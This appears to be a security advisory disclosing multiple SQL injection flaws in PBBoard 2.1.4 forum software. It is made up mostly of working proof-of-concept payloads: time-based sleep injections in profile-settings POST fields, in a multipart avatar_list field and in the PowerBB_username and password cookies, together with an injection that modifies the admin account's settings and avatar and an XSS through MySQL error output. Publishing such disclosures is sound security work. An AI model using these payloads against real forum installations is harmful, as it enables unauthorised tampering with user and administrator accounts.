PBBoard 2.1.4 SQL Injection

2012.05.30
Credit: loneferret
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Title: PBBoard v2.1.4 multiple SQLi Vulnerabilities # Version: 2.1.4 # Author/Found by: loneferret # Software Site: http://www.pbboard.com/PBBoard_v2.1.4.zip # Other vulnerabilities: http://www.exploit-db.com/exploits/18937/ # Date found: May 29th 2012 # Tested on: Ubuntu Server 8.04 / PHP Version 5.2.4-2ubuntu5.23 # Vulnerability: # Due to improper sanitization, many of the parameters are injectable. # Need a user account to trigger these. # As always you can have fun... PoC: Page: Personal Options settings Parameters: style= lang= hide_online= user_time= send_allow= pm_emailed= pm_window= visitormessage= Method: POST POST DATA: style=1&lang=1&hide_online=0&user_time=0&send_allow=1&pm_emailed=0&pm_window=1&visitormessage=2' where id='2' and sleep(5)#&send=Save By changing the 'id' number used in the 'where' clause, you can modify another user's settings. Id=1 being admin you can, for example, change his/her timezone POST DATA: style=1&lang=1& hide_online=0&user_time=+10& send_allow=1& pm_emailed=0& pm_window=1& visitormessage=2' where id='1'#&send=Save Another thing, you can get an XSS using the MySQL's error message. Which is always funny. POST DATA: style=1& lang=1& hide_online=0 &user_time=+10& send_allow=1& pm_emailed=0& pm_window=1& visitormessage=<script>alert('xss');</script>#&send=Save PoC #2: Here's another example, where we get mysql to sleep for 5 seconds, as well as change the admin's (id=1) avatar. Page: Change avatar Parameter: avatar_path= Method: POST POST DATA: -----------------------------68511802421187978011060806853\r\n Content-Disposition: form-data; name="options"\r\n \r\n list\r\n -----------------------------68511802421187978011060806853\r\n Content-Disposition: form-data; name="avatar_list"\r\n \r\n look/images/avatar/coof.jpg' where id='1' and sleep(5)#\r\n <--Right Here -----------------------------68511802421187978011060806853\r\n Content-Disposition: form-data; name="avatar"\r\n \r\n http://\r\n -----------------------------68511802421187978011060806853\r\n Content-Disposition: form-data; name="upload"; filename=""\r\n Content-Type: application/octet-stream\r\n \r\n \r\n -----------------------------68511802421187978011060806853\r\n Content-Disposition: form-data; name="change_avatar"\r\n \r\n Edit Settings\r\n -----------------------------68511802421187978011060806853--\r\n PoC #3: SQLi in the cookie. Just need to modify the cookie value using your favorite tool. Parameter: PowerBB_username & PowerBB_password PowerBB_username=loneferret' and sleep(5)# or PowerBB_password=e10adc3949ba59abbe56e057f20f883e' and sleep(5)# (and if you're wondering there are 58 fields)

References:

http://www.exploit-db.com/exploits/18937/
http://www.pbboard.com/PBBoard_v2.1.4.zip


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top